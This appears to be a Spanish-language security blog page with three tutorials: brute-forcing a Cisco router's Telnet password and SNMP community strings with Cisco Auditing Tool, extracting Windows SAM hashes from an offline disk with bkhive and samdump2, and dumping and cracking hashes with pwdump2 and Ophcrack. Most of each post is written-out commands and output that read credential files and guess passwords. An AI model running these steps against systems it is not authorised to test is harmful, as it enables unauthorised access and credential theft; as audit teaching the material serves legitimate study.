Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Password Brute Force con Cisco Auditing Tool

Cisco Auditing Tool (CAT) es una mini herramienta de auditoría de seguridad. Analiza las vulnerabilidades mas comunes de los routers Cisco, como las contraseñas por defecto, las cadenas de comunidad SNMP y algunos de los antiguos errores del IOS. Incluye tambien soporte para demás plugins y el escaneo de múltiples hosts.

En BackTrack para iniciar la herramienta Cisco Auditing Tool nos vamos al menú Aplications - BackTrack - Vulnerability Assessment - Network Assessment - Cisco Tools. Una vez que la ventana de la consola se haya cargado correctamente, podremos mirar todas las opciones posibles que podemos utilizar en contra del nuestro objetivo.

Cisco Auditing Tool en BackTrack.

En caso de que decidamos utilizar la herramienta directamente desde la terminal, lo podemos realzar de la siguiente manera.

cd /pentest/cisco/cisco-auditing-tool/
./CAT --help

Y lo anterior nos mostrara lo siguiente.
./CAT version [unknown] calling Getopt::Std::getopts (version 1.06 [paranoid]),
running under Perl version 5.10.1.

Usage: CAT [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]

The following single-character options are accepted:
With arguments: -h -f -p -w -a -l
Boolean (without arguments): -i -q

Options may be merged together.  -- stops processing of options.
Space is not required between options and their arguments.
[Now continuing due to backward compatibility and excessive paranoia.
See ``perldoc Getopt::Std'' about $Getopt::Std::STANDARD_HELP_VERSION.]

Cisco Auditing Tool - g0ne [null0]
Usage:
-h hostname (for scanning single hosts)
-f hostfile (for scanning multiple hosts)
-p port # (default port is 23)
-w wordlist (wordlist for community name guessing)
-a passlist (wordlist for password guessing)
-i [ioshist] (Check for IOS History bug)
-l logfile (file to log to, default screen)
-q quiet mode (no screen output)

root@delfi:/pentest/cisco/cisco-auditing-tool#
Cisco Auditing Tool.

Estas son las opciones y descripciones sobre el uso de CAT. Vamos a ejecutar las siguientes opciones en contra de nuestro objetivo, un dispositivo Cisco (2600).

-h hostname (for scanning single hosts)
-w wordlist (wordlist for community name guessing)
-a passlist (wordlist for password guessing)

Esta combinación de fuerza bruta y escaneo del dispositivo cisco es para averiguar cualquier contraseña conocida y los nombres de las comunidades SNMP. Antes de realizar la prueba, tenemos que actualizar también la lista de las contraseñas y community strings de SNMP en la ruta pentest/cisco/cisco-auditing-tool/lists con el fin de obtener una mayor probabilidad de éxito. Bueno vamos a realizarlo de la siguiente manera.

./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -1

root@delfi:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -1
Unknown option: 1

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.1.102

Guessing passwords:

Invalid Password: list
Invalid Password: cisco1
Invalid Password: cisco
Invalid Password: passwordvty
Password Found: p4sswordvty
Invalid Password: ciscos
Invalid Password: public
Invalid Password: private
Invalid Password: admin
Invalid Password: cisco_comu
Invalid Password: cisco1
Invalid Password: cisco2
Invalid Password: router
Invalid Password: routercisco
Invalid Password: secret
Invalid Password: Cisco
Invalid Password: telnet
Invalid Password: 123456
Invalid Password: default
Invalid Password: nicolay
Invalid Password: router1
Invalid Password:

Guessing Community Names:

Invalid Community Name: list
Community Name Found: public
Community Name Found: private
Invalid Community Name: cisco
Invalid Community Name: cisco1
Community Name Found: ciscos
Invalid Community Name: default
Invalid Community Name: Cisco
Community Name Found: cisco_comu
Invalid Community Name: adm

---------------------------------------------------
Audit Complete
Salida de Cisco Auditing Tool.

Para obtener mejores resultados lo recomendable es editar los archivos que se encuentran en la ruta pentest/cisco/cisco-auditing-tool/lists podemos utilizar cualquier editor de texto o el editor Vim para agregar mas palabras a los archivos y así obtener unos mejores resultados de salida.
En este vídeo se muestra como crackear una contraseña en un sistema windows apagado o de igual manera puede servir con tener la imagen de dicho sistema. En resumen para crackear las contraseñas de Windows desde una imagen o partición debe cumplirse tres tareas principales.
  1. Obtener el Syskey (System key)
  2. Extraer los hashes del archivo SAM
  3. Crackear los hashes para determinar las contraseñas asociada
Video Online
http://www.youtube.com/watch?v=lK8GX_7Bek8

Herramientas
Comandos
root@bt:~# fdisk -l
root@bt:~# mkdir /mnt/windows
root@bt:~# mount /dev/hda1 /mnt/windows
root@bt:~# mount -t ntfs-3g /dev/sda1 /mnt/usb -o force
root@bt:~# cd /mnt/windows/WINDOWS/system32/config/
root@bt:/mnt/windows/WINDOWS/system32/config/# ls
root@bt:/mnt/windows/WINDOWS/system32/config/# cp SAM /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cp system /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cd /mnt/usb
root@bt:/mnt/usb# bkhive system key
root@bt:/mnt/usb# samdump2 ./system ./SAM > /mnt/usb/hashes.txt
root@bt:/mnt/usb# cat ./hashes.txt
root@bt:/mnt/usb# poweroff

Cracking de Passwords Offline (Syskey)

En un anterior post, hablamos de crackear una contraseña de un sistema en ejecución, ahora en este post veremos como crackear una contraseña en un sistema que este apagado o teniendo una imagen de dicho sistema.

Herramientas
Para crackear las contraseñas de Windows desde una imagen o partición debe cumplirse tres tareas principales.
  1. Obtener el Syskey (System key)
  2. Extraer los hashes del archivo SAM
  3. Crackear los hashes para determinar las contraseñas asociadas
El System key o Syskey es una capa adicional de seguridad que Windows utiliza para proteger las contraseñas de windows. Esta clave se utiliza para cifrar el archivo SAM. Aunque el sistema operativo este en funcionamiento, el Syskey se utiliza para descifrar la SAM y así el sistema operativo pueda acceder a su contenido, pero si el sistema no está encendido, el archivo SAM se almacena en un formato cifrado.

Para saltar el cifrado Syskey, primero debemos extraer el syskey del registro y luego usar esa misma clave para descifrar el archivo SAM. Para realizar este primer paso vamos utilizar una herramienta llamada Bkhive, en mi caso estoy utilizando backtrack donde ya viene incluido esta herramienta.

Suponiendo que ya hemos iniciado desde Live-CD/USB de Backtrack. Lo primer que aremos es ver que unidades estan montadas, para esto podemos usar el comando fdisk -l.

fdisk -l


Como podemos ver, tenemos la unidad hda1 que tiene windows, solo que no esta montada y la unidad sda1 es la unidad flash donde guardaremos los archivos de la SAM, SYSTEM y los hashes, asi que lo primero que aremos es montar las unidades y crear un directorio donde montaremos el disco duro o particion de windows, y la memoria flash sda1. Para montar montar las unidades tecleamos lo siguiente en consolsa.

Comando para crear el directorio donde montaremos windows.

mkdir /mnt/windows

Una vez creado el directorio vamos a montar las unidades con los siguientes comandos.

mount /dev/hda1 /mnt/windows
mount /dev/sda1 /mnt/usb

Donde hda1 es la unidad donde esta windows y sda1 es la unidad USB donde guardaremos los archivos de la SAM y los hashes.


Una vez montada la unidad ya podremos ver y acceder a los archivos de windows.


Ahora nos dirigimos a la ruta /mnt/windows/WINDOWS/system32/config/ donde se encuentran los archivos SAM y SYSTEM.

cd /mnt/windows/WINDOWS/system32/config/
ls


Ahora para copiar los archivos SAM y SYSTEM a la unidad flash.

cp SAM /mnt/usb/
cp system /mnt/usb/


Con esto ya tenemos los archivos que necesitamos, ahora nos dirigimos a la carpeta donde copiamos los archivos anteriores que es en /mnt/usb/ para utilizar la herramienta bkhive para extraer la informacion necesaria y volcar los hashes del archivo SAM. Para ejecutar Bkhive utilizaremos la sintaxis bkhive system key, esto hará que bkhive extraiga la clave System Key y generar un archivo llamado key, tal como se muestra a continuación.

cd /mnt/usb/
bkhive system key


Hemos extraído el System Key, ahora vamos utilizarlo para descifrar el archivo SAM. A continuacion extraeremos el hash del archivo SAM, para esto utilizaremos Samdump2, como en backtrack esta disponible esta herramienta solo toca ejecutar samdump2. Lo que aremos es generar el archivo hashes.txt en nuestra unidad USB para su posterior crackeo, para realizar esto tecleamos en consola el siguiente comando.

samdumo2 ./system ./sam > /mnt/usb/hashes.txt


Esto generara un archivo en nuestro usb con los hashes.


Crackeo del hash con Ophcrack

Una vez teniendo los archivos necesarios en la unidad USB, vamos a utilizar ophcrack para crackear los hashes.


Tal como se mostro en el post anterior este proceso puede tardar segundos, minutos, horas incluso días dependiendo de la cantidad de usuarios y la complejidad de las contraseñas. Al final hemos obtenido los passwords de los usuario.


Video Cracking Syskey and the SAM using Bkhive & Samdump2 & Ophcrack

Video Online
http://www.youtube.com/watch?v=lK8GX_7Bek8

Espero les sirva y nos vemos en la próxima entrada. Saludos!

Crackear Contraseñas de Windows con Pwdump2 y Ophcrack

Herramientas
Para obtener los hashes, Pwdump2 debe ser ejecutado con privilegios de administrador. El uso de pwdump es muy sencillo simplemente tecleando el comando pwdump2 en el símbolo del sistema y los resultados se mostraran en pantalla y también tenemos la opción de redirigir los resultados directamente en un archivo de texto con el siguiente comando.

pwdump2 >> pass.txt

El comando anterior no enviara los resultados en la pantalla, los enviara a un archivo de texto que utilizaremos en el siguiente paso para crackear los hashes con ophrack. El siguiente imagen se muestra los resultados de la ejecución del comando pwdump2.

Resultados de Pwdump2

Una vez generado los nombres de usuario y los hashes pasaremos al siguiente paso que es crackear la contraseña utilizando ophcrack.

Crackear el Hash con Opcrack.

Ophcrack es una herramienta para crackear contraseñas de windows basada en tablas Rainbow, puede ser ejecutada desde un live-cd o puedes instalarlo en tu sistema.

Lo que necesitamos es descargar los Rainbow tables http://ophcrack.sourceforge.net/tables.php

Así que una vez instalado ophcrack y descargado al menos los Rainbow tables "XP free small" o "XP free fast" ejecutamos ophcrack, dar clic en "tables" y agregar las tablas dando clic en install navegando en el directorio donde se encuentren. Dar clic en OK y las tablas deben aparecer en la parte de abajo.


Enseguida damos clic en Load y seleccionamos el archivo "pwdump file" ahora buscamos el archivo pass.txt que genero pwdump2.

Hecho lo anterior dar clic en el icono "Crack" y dejamos que Ophcrack realice su trabajo. Este proceso puede tardar segundos, minutos, horas incluso dias dependiendo de la cantidad de usuarios y la complejidad de las contraseñas.

Proceso de crackeo

Este ejemplo solo duro unos segundos ya que la contraseña utilizada es muy debil, asi que la recomendacion es tener una contraseña fuerte.

Crackeado el archivo de hashes pass.txt

Algo viejo pero puede ser util. Saludos!